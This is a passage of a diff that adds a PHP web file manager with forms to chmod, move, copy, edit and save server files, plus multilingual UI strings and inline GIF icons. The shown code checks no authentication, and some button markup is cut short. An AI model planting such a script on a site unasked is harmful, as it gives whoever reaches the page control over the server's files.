+			<a href="<?php echo("$self?" . SID . '&delete=' . urlencode($delete) . '&sure=TRUE'); ?>">[ <?php echo($words['yes']); ?> ]</a>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Change permission */
+if (!empty($_GET['permission'])) {
+	$permission = relpathtoabspath($_GET['permission'], $_SESSION['dir']);
+	if ($p = @fileperms($permission)) {
+		if (!empty($_GET['set'])) {
+			$p = 0; 
+			if (isset($_GET['ur'])) $p |= 0400; if (isset($_GET['uw'])) $p |= 0200; if (isset($_GET['ux'])) $p |= 0100;
+			if (isset($_GET['gr'])) $p |= 0040; if (isset($_GET['gw'])) $p |= 0020; if (isset($_GET['gx'])) $p |= 0010;
+			if (isset($_GET['or'])) $p |= 0004; if (isset($_GET['ow'])) $p |= 0002; if (isset($_GET['ox'])) $p |= 0001;
+			if (@chmod($_GET['permission'], $p)) {
+				$notice = buildphrase(array('&quot<b>' . htmlentities($permission) . '</b>&quot;', '&quot;<b>' . substr(octtostr("0$p"), 1) . '</b>&quot; (<b>' . decoct($p) . '</b>)'), $words['permsset']);
+			} else {
+				$error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
+			}
+		} else {
+			html_header($words['permission']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table>
+			<tr>
+				<td><?php echo($words['file']); ?>:</td>
+				<td><input type="text" name="permission" value="<?php echo(htmlentities($permission)); ?>" size="<?php echo(textfieldsize($permission)); ?>"></td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			<tr>
+				<td valign="top">
+					<?php echo($words['permission']); ?>:&nbsp;
+					</form><form action="<?php echo($self); ?>" method="get">
+					<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+					<input type="hidden" name="permission" value="<?php echo(htmlentities($permission)); ?>">
+					<input type="hidden" name="set" value="TRUE">
+				</td>
+				<td colspan="2">
+					<table border="0">
+					<tr>
+						<td>&nbsp;</td>
+						<td><?php echo($words['owner']); ?></td>
+						<td><?php echo($words['group']); ?></td>
+						<td><?php echo($words['other']); ?></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['read']); ?>:</td>
+						<td align="center"><input type="checkbox" name="ur" value="1"<?php if ($p & 00400) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gr" value="1"<?php if ($p & 00040) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="or" value="1"<?php if ($p & 00004) echo(' checked'); ?>></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['write']); ?>:</td>
+						<td align="center"><input type="checkbox" name="uw" value="1"<?php if ($p & 00200) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gw" value="1"<?php if ($p & 00020) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="ow" value="1"<?php if ($p & 00002) echo(' checked'); ?>></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['exec']); ?>:</td>
+						<td align="center"><input type="checkbox" name="ux" value="1"<?php if ($p & 00100) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gx" value="1"<?php if ($p & 00010) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="ox" value="1"<?php if ($p & 00001) echo(' checked'); ?>></td>
+					</tr>
+					</table>
+				</td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td colspan="2"><input type="submit" value="<?php echo($words['setperms']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+			html_footer();
+			exit;
+		}
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
+	}
+}
+
+/* Move file */
+if (!empty($_GET['move'])) {
+	$move = relpathtoabspath($_GET['move'], $_SESSION['dir']);
+	if (!empty($_GET['destination'])) {
+		$destination = relpathtoabspath($_GET['destination'], dirname($move));
+		if (@is_dir($destination)) $destination = spath($destination) . basename($move);
+		if ($move == $destination) {
+			$error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
+		} else {
+			if (is_free($destination) && @rename($move, $destination)) {
+				$notice = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['moved']);
+			} else {
+				$error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notmoved']);
+			}
+		}
+	} else {
+		html_header($words['move']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="move" value="<?php echo(htmlentities($move)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><b><?php echo(htmlentities($move)); ?></b></td>
+			</tr>
+			<tr>
+				<td><?php echo($words['moveto']); ?>:&nbsp;</td>
+				<td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($move)))); ?>" size="<?php echo(textfieldsize($move)); ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['move']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Copy file */
+if (!empty($_GET['cpy'])) {
+	$copy = relpathtoabspath($_GET['cpy'], $_SESSION['dir']);
+	if (!empty($_GET['destination'])) {
+		$destination = relpathtoabspath($_GET['destination'], dirname($copy));
+          if (@is_dir($destination)) $destination = spath($destination) . basename($copy);
+		if ($copy == $destination) {
+			$error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
+		} else {
+			if (is_free($destination) && @copy($copy, $destination)) {
+				$notice = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['copied']);
+			} else {
+				$error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notcopied']);
+			}
+		}
+	} else {
+		html_header($words['copy']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="cpy" value="<?php echo(htmlentities($copy)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><b><?php echo(htmlentities($copy)); ?></b></td>
+			</tr>
+			<tr>
+				<td><?php echo($words['copyto']); ?>:&nbsp;</td>
+				<td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($copy)))); ?>" size="<?php echo(textfieldsize($copy)); ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['copy']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Save edited file */
+if (!empty($_POST['edit']) && isset($_POST['save'])) {
+	$edit = relpathtoabspath($_POST['edit'], $_SESSION['dir']);
+	if ($f = @fopen($edit, 'w')) {
+		/* write file without carriage returns */
+		fwrite($f, str_replace("\r\n", "\n", $_POST['content']));
+		fclose($f);
+		$notice = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['saved']);
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['notsaved']);
+	}
+}
+
+/* Edit file */
+if (isset($_REQUEST['edit']) && !isset($_POST['save'])) {
+	$file = relpathtoabspath($_REQUEST['edit'], $_SESSION['dir']);
+	if (@is_dir($file)) {
+		/* If the requested file is a directory, show the directory */
+		$_SESSION['dir'] = $file;
+		$updatetreeview = TRUE;
+	} else {
+		if ($f = @fopen($file, 'r')) {
+			html_header($words['edit']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><input type="text" name="edit" value="<?php echo(htmlentities($file)); ?>" size="<?php echo(textfieldsize($file)); ?>">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+	<form action="<?php echo($self); ?>" method="post" name="f">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="edit" value="<?php echo(htmlentities($file)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEFF" align="center"><textarea name="content" rows="<?php echo($editrows); ?>" cols="<?php echo($editcols); ?>" wrap="off" style="background: #EEEEFF; border: none;"><?php
+			if (isset($_POST['content'])) {
+				echo(htmlentities($_POST['content']));
+				if (isset($_POST['add']) && !empty($_POST['username']) && !empty($_POST['password'])) {
+					echo("\n" . htmlentities($_POST['username'] . ':' . crypt($_POST['password'])));
+				}
+			} else {
+				echo(htmlentities(fread($f, filesize($file))));
+			}
+			fclose($f);
+?></textarea></td>
+	</tr>
+<?php if (basename($file) == '.htpasswd') { /* specials with .htpasswd */ ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['username']); ?>:&nbsp;</td>
+				<td><input type="text" name="username" size="15">&nbsp;</td>
+				<td><?php echo($words['password']); ?>:&nbsp;</td>
+				<td><input type="password" name="password" size="15">&nbsp;</td>
+				<td><input type="submit" name="add" value="<?php echo($words['add']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+<?php } if (basename($file) == '.htaccess') { /* specials with .htaccess */ ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><input type="button" value="<?php echo($words['addauth']); ?>" 
+	</tr>
+<?php } ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center">
+			<input type="button" value="<?php echo($words['reset']); ?>" 
+			<input type="button" value="<?php echo($words['clear']); ?>" '')">
+			<input type="submit" name="save" value="<?php echo($words['save']); ?>">
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+			html_footer();
+			exit;
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot; ', $words['notopened']);
+		}
+	}
+}
+
+/* Show directory listing (and treeview) */
+if (!empty($_SESSION['tree'])) {
+	if (isset($_REQUEST['frame']) && $_REQUEST['frame'] == 'treeview') {
+		treeview();
+	} else {
+		if (isset($_GET['noupdate'])) $updatetreeview = FALSE;
+		dirlisting(TRUE);
+	}
+} else {
+	dirlisting();
+}
+
+/* ------------------------------------------------------------------------- */
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+function relpathtoabspath ($file, $dir) {
+	$dir = spath($dir);
+	if (substr($file, 0, 1) != '/') $file = $dir . $file;
+	if (!@is_link($file) && ($r = realpath($file)) != FALSE) $file = $r;
+	if (@is_dir($file) && !@is_link($file)) $file = spath($file);
+	return $file;
+}
+
+function abspathtorelpath ($pos, $target) {
+	$pos = spath($pos);
+	$path = '';
+	while ($pos != $target) {
+		if ($pos == substr($target, 0, strlen($pos))) {
+			$path .= substr($target, strlen($pos));
+			break;
+		} else {
+			$path .= '../';
+			$pos = strrev(strstr(strrev(substr($pos, 0, strlen($pos) - 1)), '/'));
+		}
+	}
+	return $path;
+}
+
+function is_script ($file) {
+	return ereg('.php[3-4]?$', $file);
+}
+
+function spath ($path) {
+	if (substr($path, strlen($path) - 1, 1) != '/') $path .= '/';
+	return $path;
+}
+
+function textfieldsize ($str) {
+	$size = strlen($str) + 5;
+	if ($size < 30) $size = 30;
+	return $size;
+}
+
+function is_free ($file) {
+	global $words;
+	if (@file_exists($file) && empty($_GET['overwrite'])) {
+		html_header($words['alreadyexists']);
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['overwrite'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" align="center" bgcolor="#EEEEEE">
+			<a href="<?php echo("{$_SERVER['REQUEST_URI']}&overwrite=yes"); ?>">[ <?php echo($words['yes']); ?> ]</a>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+		html_footer();
+		exit;
+	}
+	if (!empty($_GET['overwrite'])) {
+		return remove($file);
+	}
+	return TRUE;
+}
+
+function remove ($file) {
+	global $updatetreeview;
+	if (@is_dir($file) && !@is_link($file)) {
+		$error = FALSE;
+		if ($p = @opendir($file = spath($file))) {
+			while (($f = readdir($p)) !== FALSE)
+				if ($f != '.' && $f != '..' && !remove($file . $f))
+					$error = TRUE;
+		}
+		if ($error) $x = FALSE; else $x = @rmdir($file);
+		$updatetreeview = TRUE;
+		if ($x && !empty($_SESSION['tree'])) {
+			$file = spath(dirname($file));
+			$_SESSION['hassubdirs'][$file] = tree_hassubdirs($file);
+			tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file, TRUE);
+		}
+	} else {
+		$x = @unlink($file);
+	}
+	return $x;
+}
+
+function getwords ($language) {
+	switch ($language) {
+	case 'de':
+		$words['dir'] = 'Verzeichnis'; $words['file'] = 'Datei';
+		$words['filename'] = 'Dateiname'; $words['size'] = 'Gr&ouml;&szlig;e'; $words['permission'] = 'Rechte'; $words['functions'] = 'Funktionen';
+		$words['owner'] = 'Eigner'; $words['group'] = 'Gruppe'; $words['other'] = 'Andere';
+		$words['create'] = 'erstellen'; $words['copy'] = 'kopieren'; $words['copyto'] = 'kopieren nach'; $words['move'] = 'verschieben'; $words['moveto'] = 'verschieben nach'; $words['delete'] = 'l&ouml;schen'; $words['edit'] = 'editieren';
+		$words['read'] = 'lesen'; $words['write'] = 'schreiben'; $words['exec'] = 'ausf&uuml;hren'; $words['change'] = 'wechseln'; $words['upload'] = 'hochladen'; $words['configure'] = 'konfigurieren';
+		$words['yes'] = 'ja'; $words['no'] = 'nein';
+		$words['back'] = 'zur&uuml;ck'; $words['setperms'] = 'Rechte setzen';
+		$words['readingerror'] = 'Fehler beim Lesen von 1';
+		$words['permsset'] = 'Die Rechte von 1 wurden auf 2 gesetzt.'; $words['permsnotset'] = 'Die Rechte von 1 konnten nicht gesetzt werden.';
+		$words['uploaded'] = '1 wurde nach 2 hochgeladen.'; $words['notuploaded'] = '1 konnte nicht nach 2 hochgeladen werden.';
+		$words['moved'] = '1 wurde nach 2 verschoben.'; $words['notmoved'] = '1 konnte nicht nach 2 verschoben werden.';
+		$words['copied'] = '1 wurde nach 2 kopiert.'; $words['notcopied'] = '1 konnte nicht nach 2 kopiert werden.';
+		$words['created'] = '1 wurde erstellt.'; $words['notcreated'] = '1 konnte nicht erstellt werden.';
+		$words['deleted'] = '1 wurde gel&ouml;scht.'; $words['notdeleted'] = '1 konnte nicht gel&ouml;scht werden.'; $words['suredelete'] = '1 wirklich l&ouml;schen?';
+		$words['saved'] = '1 wurde gespeichert.'; $words['notsaved'] = '1 konnte nicht gespeichert werden.';
+		$words['reset'] = 'zur&uuml;cksetzen'; $words['clear'] = 'verwerfen'; $words['save'] = 'speichern';
+		$words['cantbeshown'] = '1 kann nicht angezeigt werden.'; $words['sourceof'] = 'Quelltext von 1';
+		$words['notopened'] = '1 konnte nicht ge&ouml;ffnet werden.';
+		$words['addauth'] = 'Standard-Authentifizierungseinstellungen hinzuf&uuml;gen';
+		$words['username'] = 'Benutzername'; $words['password'] = 'Kennwort'; $words['add'] = 'hinzuf&uuml;gen';
+		$words['treeon'] = 'Baumansicht aktivieren'; $words['treeoff'] = 'Baumansicht deaktivieren';
+		$words['symlink'] = 'Symbolischer Link'; $words['createsymlink'] = 'Link erstellen'; $words['target'] = 'Ziel';
+		$words['reltarget'] = 'Relative Pfadangabe des Ziels';
+		$words['alreadyexists'] = 'Die Datei existiert bereits.';
+		$words['overwrite'] = 'Soll 1 &uuml;berschrieben werden?';
+		$words['samefiles'] = '1 und 2 sind identisch.';
+		break;
+	case 'cz':
+		$words['dir'] = 'Adres&#xE1;&#x0159;'; $words['file'] = 'Soubor';
+		$words['filename'] = 'Jm&#xE9;no souboru'; $words['size'] = 'Velikost'; $words['permission'] = 'Pr&#xE1;va'; $words['functions'] = 'Functions';
+		$words['owner'] = 'Vlastn&#xED;k'; $words['group'] = 'Skupina'; $words['other'] = 'Ostatn&#xED;';
+		$words['create'] = 'vytvo&#x0159;it'; $words['copy'] = 'kop&#xED;rovat'; $words['copyto'] = 'kop&#xED;rovat do'; $words['move'] = 'p&#x0159;esunout'; $words['moveto'] = 'p&#x0159;esunout do'; $words['delete'] = 'odstranit'; $words['edit'] = '&#xFA;pravy';
+		$words['read'] = '&#x010D;ten&#xED;'; $words['write'] = 'z&#xE1;pis'; $words['exec'] = 'spu&#x0161;t&#x011B;n&#xED;'; $words['change'] = 'zm&#x011B;nit'; $words['upload'] = 'nahr&#xE1;t'; $words['configure'] = 'nastaven&#xED;';
+		$words['yes'] = 'ano'; $words['no'] = 'ne';
+		$words['back'] = 'zp&#xE1;tky'; $words['setperms'] = 'nastav pr&#xE1;va';
+		$words['readingerror'] = 'Chyba p&#x0159;i &#x010D;ten&#xED; 1';
+		$words['permsset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 byla nastavena na 2.'; $words['permsnotset'] = 'P&#x0159;&#xED;stupov&#xE1; pr&#xE1;va k 1 nelze  nastavit na 2.';
+		$words['uploaded'] = 'Soubor 1 byl ulo&#x017E;en do adres&#xE1;&#x0159;e 2.'; $words['notuploaded'] = 'Chyba p&#x0159;i ukl&#xE1;d&#xE1;n&#xED; souboru 1 do adres&#xE1;&#x0159;e 2.';
+		$words['moved'] = 'Soubor 1 byl p&#x0159;esunut do adres&#xE1;&#x0159;e 2.'; $words['notmoved'] = 'Soubor 1 nelze p&#x0159;esunout do adres&#xE1;&#x0159;e 2.';
+		$words['copied'] = 'Soubor 1 byl zkop&#xED;rov&#xE1;n do adres&#xE1;&#x0159;e 2.'; $words['notcopied'] = 'Soubor 1 nelze zkop&#xED;rovat do adres&#xE1;&#x0159;e 2.';
+		$words['created'] = '1 byl vytvo&#x0159;en.'; $words['notcreated'] = '1 nelze vytvo&#x0159;it.';
+		$words['deleted'] = '1 byl vymaz&#xE1;n.'; $words['notdeleted'] = '1 nelze vymazat.'; $words['suredelete'] = 'Skute&#x010D;n&#x011B; smazat 1?';
+		$words['saved'] = 'Soubor 1 byl ulo&#x017E;en.'; $words['notsaved'] = 'Soubor 1 nelze ulo&#x017E;it.';
+		$words['reset'] = 'zp&#x011B;t'; $words['clear'] = 'vy&#x010D;istit'; $words['save'] = 'ulo&#x017E;';
+		$words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
+		$words['notopened'] = "1 nelze otev&#x0159;&#xED;t";
+		$words['addauth'] = 'p&#x0159;idat z&#xE1;kladn&#xED;-authentifikaci';
+		$words['username'] = 'U&#x017E;ivatelsk&#xE9; jm&#xE9;no'; $words['password'] = 'Heslo'; $words['add'] = 'p&#x0159;idat';
+		$words['treeon'] = 'Zobraz strom adres&#xE1;&#x0159;&#x016F;'; $words['treeoff'] = 'Skryj strom adres&#xE1;&#x0159;&#x016F;';
+		$words['symlink'] = 'Symbolick&#xFD; odkaz'; $words['createsymlink'] = 'vytvo&#x0159;it odkaz'; $words['target'] = 'C&#xED;l';
+		$words['reltarget'] = 'Relativni cesta k c&#xED;li';
+		$words['alreadyexists'] = 'Tento soubor u&#x017E; existuje.';
+		$words['overwrite'] = 'P&#x0159;epsat 1?';
+		$words['samefiles'] = '1 a 2 jsou identick&#xE9;l.';
+		break;
+	case 'it':
+		$words['dir'] = 'Directory'; $words['file'] = 'File';
+		$words['filename'] = 'Nome file'; $words['size'] = 'Dimensioni'; $words['permission'] = 'Permessi'; $words['functions'] = 'Funzioni';
+		$words['owner'] = 'Proprietario'; $words['group'] = 'Gruppo'; $words['other'] = 'Altro';
+		$words['create'] = 'crea'; $words['copy'] = 'copia'; $words['copyto'] = 'copia su'; $words['move'] = 'muovi'; $words['moveto'] = 'muove su'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
+		$words['read'] = 'leggi'; $words['write'] = 'scrivi'; $words['exec'] = 'esegui'; $words['change'] = 'modifica'; $words['upload'] = 'upload'; $words['configure'] = 'configura';
+		$words['yes'] = 'si'; $words['no'] = 'no';
+		$words['back'] = 'back'; $words['setperms'] = 'imposta permessi';
+		$words['readingerror'] = 'Errore durante la lettura di 1';
+		$words['permsset'] = 'I permessi di 1 sono stati impostati a 2.'; $words['permsnotset'] = 'I permessi di 1 non possono essere impostati.';
+		$words['uploaded'] = '1 è stato uploadato su 2.'; $words['notuploaded'] = 'Errore durante l\'upload di 1 su 2.';
+		$words['moved'] = '1 è stato spostato su 2.'; $words['notmoved'] = '1 non può essere spostato su 2.';
+		$words['copied'] = '1 è stato copiato su 2.'; $words['notcopied'] = '1 non può essere copiato su 2.';
+		$words['created'] = '1 è stato creato.'; $words['notcreated'] = 'impossibile creare 1.';
+		$words['deleted'] = '1 è stato eliminato.'; $words['notdeleted'] = 'Impossibile eliminare 1.'; $words['suredelete'] = 'Confermi eliminazione di 1?';
+		$words['saved'] = '1 è stato salvato.'; $words['notsaved'] = 'Impossibile salvare 1.';
+		$words['reset'] = 'reimposta'; $words['clear'] = 'pulisci'; $words['save'] = 'salva';
+		$words['cantbeshown'] = "Impossibile visualizzare 1."; $words['sourceof'] = 'sorgente di 1';
+		$words['notopened'] = "Impossibile aprire 1";
+		$words['addauth'] = 'aggiunge autenticazione di base';
+		$words['username'] = 'Nome Utente'; $words['password'] = 'Password'; $words['add'] = 'add';
+		$words['treeon'] = 'Abilita vista ad albero'; $words['treeoff'] = 'Disabilita vista ad albero';
+		$words['symlink'] = 'Link simbolico'; $words['createsymlink'] = 'crea symlink'; $words['target'] = 'Target';
+		$words['reltarget'] = 'Percorso relativo al target';
+		$words['alreadyexists'] = 'Questo file esiste già.';
+		$words['overwrite'] = 'Sovrascrivi 1?';
+		$words['samefiles'] = '1 e 2 sono identici.';
+		break;
+	case 'en':
+	default:
+		$words['dir'] = 'Directory'; $words['file'] = 'File';
+		$words['filename'] = 'Filename'; $words['size'] = 'Size'; $words['permission'] = 'Permission'; $words['functions'] = 'Functions';
+		$words['owner'] = 'Owner'; $words['group'] = 'Group'; $words['other'] = 'Other';
+		$words['create'] = 'create'; $words['copy'] = 'copy'; $words['copyto'] = 'copy to'; $words['move'] = 'move'; $words['moveto'] = 'move to'; $words['delete'] = 'delete'; $words['edit'] = 'edit';
+		$words['read'] = 'read'; $words['write'] = 'write'; $words['exec'] = 'execute'; $words['change'] = 'change'; $words['upload'] = 'upload'; $words['configure'] = 'configure';
+		$words['yes'] = 'yes'; $words['no'] = 'no';
+		$words['back'] = 'back'; $words['setperms'] = 'set permission';
+		$words['readingerror'] = 'Error during read of 1';
+		$words['permsset'] = 'The permission of 1 were set to 2.'; $words['permsnotset'] = 'The permission of 1 could not be set.';
+		$words['uploaded'] = '1 has been uploaded to 2.'; $words['notuploaded'] = 'Error during upload of 1 to 2.';
+		$words['moved'] = '1 has been moved to 2.'; $words['notmoved'] = '1 could not be moved to 2.';
+		$words['copied'] = '1 has been copied to 2.'; $words['notcopied'] = '1 could not be copied to 2.';
+		$words['created'] = '1 has been created.'; $words['notcreated'] = '1 could not be created.';
+		$words['deleted'] = '1 has been deleted.'; $words['notdeleted'] = '1 could not be deleted.'; $words['suredelete'] = 'Really delete 1?';
+		$words['saved'] = '1 has been saved.'; $words['notsaved'] = '1 could not be saved.';
+		$words['reset'] = 'reset'; $words['clear'] = 'clear'; $words['save'] = 'save';
+		$words['cantbeshown'] = "1 can't be shown."; $words['sourceof'] = 'source of 1';
+		$words['notopened'] = "1 couldn't be opened";
+		$words['addauth'] = 'add basic-authentification';
+		$words['username'] = 'Username'; $words['password'] = 'Password'; $words['add'] = 'add';
+		$words['treeon'] = 'Enable treeview'; $words['treeoff'] = 'Disable treeview';
+		$words['symlink'] = 'Symbolic link'; $words['createsymlink'] = 'create link'; $words['target'] = 'Target';
+		$words['reltarget'] = 'Relative path to target';
+		$words['alreadyexists'] = 'This file already exists.';
+		$words['overwrite'] = 'Overwrite 1?';
+		$words['samefiles'] = '1 and 2 are identical.';
+	}
+	return $words;
+}
+
+function getimage ($iid) {
+	$image = 'GIF89a';
+	switch ($iid) {
+	case  1: $image .= "\23\0\22\0\242\4\0\0\0\0\377\377\377\314\314\314\231\231\231\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\23\0\22\0\0\3?H\272\334N \312\327@\270\30P%\273\237\213\205\215\244\240q\201\240\256\254:\234P\332\316o(\317l\215\342\255\36\363\71\230\5\270\362\15\211\2cr\300l:\231\60\310g\272\251Z\257\330l5\1\0;\0"; break;
+	case  2: $image .= "\23\0\22\0\221\2\0\0\0\0\314\314\314\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\23\0\22\0\0\2\64\224\217\251\2\355\233@\230\24@#\251v\357d\15V^H\6\26fr\352\312\230ehI\337;\305\63}6\364\206\356\365\350\63!V\304\323\345\210L*\227\220\2\0;\0"; break;
+	case  3: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\32\214o\200\313\355\255\236\234,\322+-\336K\363\357}[(^d9\235hP\0\0;\0"; break;
+	case  4: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234\217\251\313\355\17\15\230\224:\20\262\16\340j\241u\15\226\201\231\310\140\302\272rC\207\36d\140\272\343\27z\333yUU\4\14\12\207DF\1\0;\0"; break;
+	case  5: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2*\234\217\251\313\355\17\15\230\224:\20\262\16\340n\335\65\330\307y\302y\226]\210\214\37\273\270\33\254\310\340UU\321\316\367\376\317(\0\0;\0"; break;
+	case  6: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\33\214o\200\313\355\255\236\234,\322+-\336K\371\360q\224\46rd\211\235\350\270\76\5\0;\0"; break;
+	case  7: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2\60\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\206\204\304a\221R\0\0;\0"; break;
